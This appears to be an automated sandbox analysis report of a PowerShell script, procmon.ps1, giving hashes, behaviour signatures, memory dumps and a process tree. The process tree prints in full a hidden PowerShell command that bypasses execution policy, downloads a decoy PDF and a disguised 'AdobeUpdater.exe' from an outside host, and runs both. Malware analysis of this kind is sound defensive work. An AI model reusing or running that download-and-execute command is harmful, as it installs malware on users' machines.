Overview

overview

8

Static

static

1

procmon.ps1

windows7-x64

1

procmon.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21/04/2024, 19:42

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    procmon.ps1

  • Size

    731B

  • MD5

    df9edb9d1f78f65e95bf4e0db1639702

  • SHA1

    41df40adbf437daf8afcff8ab916c69ca500a314

  • SHA256

    bada45186ac6a13e2d5dbe0633ea1584f6fa6463986a5fb304cc6d9eb04ed676

  • SHA512

    26db55cd8e6fac6106cd5fa996c9a35a621c14fe7c1f1f898b25758d2c5d63eb1c286d0e32a897a044bb89c476c173a8cd76e127cd08e78ef58f5a796985c1d6

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\procmon.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w Minimized -ep Bypass -nop -c "iwr 'https://srv480138.hstgr.cloud/uploads/scan_3824.pdf' -OutFile C:\Users\Admin\AppData\Local\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.';C:\Users\Admin\AppData\Local\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https://srv480138.hstgr.cloud/report.php?query=QGTQZTRE' -OutFile C:\Users\Admin\AppData\Local\Temp\AdobeUpdater.exe -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.1 YaBrowser/23.11.0.0 Safari/537.36';C:\Users\Admin\AppData\Local\Temp\AdobeUpdater.exe;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2272

Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FBYWVF2DH602ETXD3SZ0.temp
          Filesize

          7KB

          MD5

          59692582b6338122a7f649a336b04948

          SHA1

          372f0ebf4f9c8f091cec40bfc7db3d0a80ceb74f

          SHA256

          ace3657f73acc087e2dea6d57d3b5151bbd98acebe4f49be20c6cf2dd9a59ebc

          SHA512

          5de4fc697ac58af14ea48a683b874b9ded0458a5e251b54242f3a547a1a5bf66d9d34bbb0862389f8732da01f3b1ba0de690febd241684ac877ad7b82663d2c8

          Download Submit

        • memory/2208-10-0x0000000002D20000-0x0000000002DA0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2208-6-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2208-7-0x0000000002D20000-0x0000000002DA0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2208-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2208-9-0x0000000002D20000-0x0000000002DA0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2208-4-0x000000001B680000-0x000000001B962000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2208-5-0x0000000002290000-0x0000000002298000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2208-18-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2272-13-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2272-14-0x0000000002DD0000-0x0000000002E10000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2272-15-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2272-16-0x0000000002DD0000-0x0000000002E10000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2272-17-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

          Download